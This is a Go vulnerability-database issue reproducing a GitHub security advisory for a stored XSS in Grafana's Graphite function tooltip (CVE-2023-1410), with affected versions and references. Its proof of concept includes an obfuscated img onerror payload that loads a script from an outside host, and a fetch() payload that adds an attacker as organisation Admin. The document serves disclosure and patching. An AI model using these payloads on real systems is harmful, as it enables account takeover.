search

golang / vulndb

[mirror] The Go Vulnerability Database
Other
564 stars 61 forks source link

x/vulndb: potential Go vuln in github.com/grafana/grafana: GHSA-qrrg-gw7w-vp76 #1674

Closed GoVulnBot closed 1 year ago

GoVulnBot commented 1 year ago

In GitHub Security Advisory GHSA-qrrg-gw7w-vp76, there is a vulnerability in the following Go packages or modules:

Unit Fixed Vulnerable Ranges
github.com/grafana/grafana 9.2.15 >= 9.0.0, < 9.2.15 github.com/grafana/grafana 9.4.7 >= 9.4.0, < 9.4.7 github.com/grafana/grafana 9.3.11 >= 9.3.0, < 9.3.11 github.com/grafana/grafana 8.5.22 >= 8.0.0, < 8.5.22

Cross references:

See doc/triage.md for instructions on how to triage this report.

modules:
  - module: github.com/grafana/grafana
    versions:
      - introduced: 9.0.0
        fixed: 9.2.15
    packages:
      - package: github.com/grafana/grafana
  - module: github.com/grafana/grafana
    versions:
      - introduced: 9.4.0
        fixed: 9.4.7
    packages:
      - package: github.com/grafana/grafana
  - module: github.com/grafana/grafana
    versions:
      - introduced: 9.3.0
        fixed: 9.3.11
    packages:
      - package: github.com/grafana/grafana
  - module: github.com/grafana/grafana
    versions:
      - introduced: 8.0.0
        fixed: 8.5.22
    packages:
      - package: github.com/grafana/grafana
summary: Grafana Stored Cross-site Scripting in Graphite FunctionDescription tooltip
description: "### Summary\nWhen a Graphite data source is added, one can use this
    data source in a dashboard. This contains a feature to use `Functions`. Once a
    function is selected, a small tooltip will be shown when hovering over the name
    of the function. This tooltip will allow you to delete the selected Function from
    your query or show the Function Description. However, no sanitization is done
    when adding this description to the DOM. Since it is not uncommon to connect to
    public data sources, and attacker could host a Graphite instance with modified
    Function Descriptions containing XSS payloads. When the victim uses it in a query
    and accidentally hovers over the Function Description, an attacker controlled
    XSS payload will be executed. This can be used to add the attacker as an Admin
    for example. \n\n### Details\n\n1. Spin up your own Graphite instance. I've done
    this using the `make devenv sources=graphite`.\n2. Now start a terminal for your
    Graphite container and modify the following file `/opt/graphite/webapp/graphite/render/functions.py`
    \n3. Basically you can pick any function but I picked the `aggregateSeriesLists`
    function. Modify its description to be `\"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY20yLnRlbCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs=
    onerror=eval(atob(this.id))>`\n\nThe result would look like this:\n\n```python\ndef
    aggregateSeriesLists(requestContext, seriesListFirstPos, seriesListSecondPos,
    func, xFilesFactor=None):\n  \"\"\"                                                                              \n
    \                                                                                             \n
    \ \"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY20yLnRlbCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs=
    onerror=eval(atob(this.id))>\n                                                                           \n
    \ \"\"\"                  \n  if len(seriesListFirstPos) != len(seriesListSecondPos):
    \  \n    raise InputParameterError(             \n      \"seriesListFirstPos and
    seriesListSecondPos argument must have equal length\")\n  results = []                                          \n
    \                                   \n  for i in range(0, len(seriesListFirstPos)):
    \       \n    firstSeries = seriesListFirstPos[i]                                           \n
    \   secondSeries = seriesListSecondPos[i]         \n    aggregated = aggregate(requestContext,
    (firstSeries, secondSeries), func, xFilesFactor=xFilesFactor) \n    if not aggregated:
    # empty list, no data found                          \n      continue                   \n
    \   result = aggregated[0]  # aggregate() can only return len 1 list           \n
    \   result.name = result.name[:result.name.find('Series(')] + 'Series(%s,%s)'
    % (firstSeries.name, secondSeries.name)\n    results.append(result)                                                                           \n
    \ return results                                                         \n                                                                                                                   \n
    \                                                                                                      \naggregateSeriesLists.group
    = 'Combine'                                                             \naggregateSeriesLists.params
    = [\n  Param('seriesListFirstPos', ParamTypes.seriesList, required=True),\n  Param('seriesListSecondPos',
    ParamTypes.seriesList, required=True),\n  Param('func', ParamTypes.aggFunc, required=True),
    \                                                      \n  Param('xFilesFactor',
    ParamTypes.float),                                \n]                                                                                                \n```\n\n4.
    Save and quit the file. Restart your Graphite Container (I did this using the
    Restart Icon in Docker Desktop)\n5. Now login to your Grafana instance as an Organisation
    Admin.\n6. Navigate to http://[grafana]/plugins/graphite and click `Create a Graphite
    data source`\n7. Add the url to the attackers Graphite instance (maybe enable
    `Skip TLS Verify`) and click `Save & test` and `Explore`\n8. In the newly opened
    page click the + icon next to `Functions` and search for `aggregateSeriesLists`
    and click it to add it.\n9. Now hover over `aggregateSeriesLists` with your mouse
    and move your mouse to the `?` icon.\n\n### Result\n\nOur payload will trigger
    and in this case it will include an external script to trigger the alerts.\n\n####
    Decoded payload\n\n```javascript\nvar a=document.createElement(\"script\");a.src=\"https://cm2.tel\";document.body.appendChild(a);\n```\n\n![image](https://user-images.githubusercontent.com/26874824/225035735-5d00e5d9-3302-4257-8f95-dd562e752893.png)\n\n\n###
    Impact\n\nIn the POC we've picked 1 function to have a XSS payload, but a real
    attacker would of course maximize the likelihood by replacing all of it's descriptions
    with XSS payloads. As shown above the attacker can now run arbitrary javascript
    in the browser of the victim. The victim can be any user using the malicious Graphite
    instance in a query (or while Exploring), including the Organisation Admin. If
    so, an attacker could include a payload to add them as an admin themselves.\n\nAn
    example would be something like this:\n\n```javascript\nfetch(\"/api/org/invites\",
    {\n  \"headers\": {\n    \"content-type\": \"application/json\"\n  },\n  \"body\":
    \"{\\\"name\\\":\\\"\\\",\\\"email\\\":\\\"\\\",\\\"role\\\":\\\"Admin\\\",\\\"sendEmail\\\":true,\\\"loginOrEmail\\\":\\\"hacker@hacker.com\\\"}\",\n
    \ \"method\": \"POST\",\n  \"credentials\": \"include\"\n});\n```\n\n### Mitigation\n\nThe
    vulnerability seems to occur in the following file: public\\app\\plugins\\datasource\\graphite\\components\\FunctionEditorControls.tsx\n\n```typescript\nconst
    FunctionDescription = React.lazy(async () => {\n  // @ts-ignore\n  const { default:
    rst2html } = await import(/* webpackChunkName: \"rst2html\" */ 'rst2html');\n
    \ return {\n    default(props: { description?: string }) {\n      return <div
    dangerouslySetInnerHTML={{ __html: rst2html(props.description ?? '') }} />;\n
    \   },\n  };\n});\n```\n\nIn many other similar cases, some form of sanitization
    is used. I would advise to use the same here as rst2html itself will just leave
    HTML untouched when parsing the expected reStructuredText from Graphite. So now
    when it is applied using dangerouslySetInnerHTML our XSS payload will survive."
cves:
  - CVE-2023-1410
ghsas:
  - GHSA-qrrg-gw7w-vp76
references:
  - advisory: https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76
  - web: https://nvd.nist.gov/vuln/detail/CVE-2023-1410
  - fix: https://github.com/grafana/grafana/commit/42911348a76e8484396b951bef8b7bff97a84cbc
  - fix: https://github.com/grafana/grafana/commit/e59427c0747ae2f3feb1bfc3a4b87f0886208cc6
  - fix: https://github.com/grafana/grafana/commit/ef2eb2b6bf1d7c0fb781e3e05d0d1aecd6dd438a
  - fix: https://github.com/grafana/grafana/commit/f9548d33f8624d6694983fe5aad181007405be8a
  - web: https://grafana.com/security/security-advisories/cve-2023-1410/
  - advisory: https://github.com/advisories/GHSA-qrrg-gw7w-vp76
gopherbot commented 1 year ago

Change https://go.dev/cl/479297 mentions this issue: data/excluded: batch add GO-2023-1674, GO-2023-1671, GO-2023-1670, GO-2023-1669, GO-2023-1668, GO-2023-1667, GO-2023-1662, GO-2023-1661, GO-2023-1660, GO-2023-1659, GO-2023-1658, GO-2023-1657, GO-2023-1656, GO-2023-1655, GO-2023-1654, GO-2023-1653, GO-2023-1673, GO-2023-1666, GO-2023-1665

gopherbot commented 5 months ago

Change https://go.dev/cl/592760 mentions this issue: data/reports: unexclude 75 reports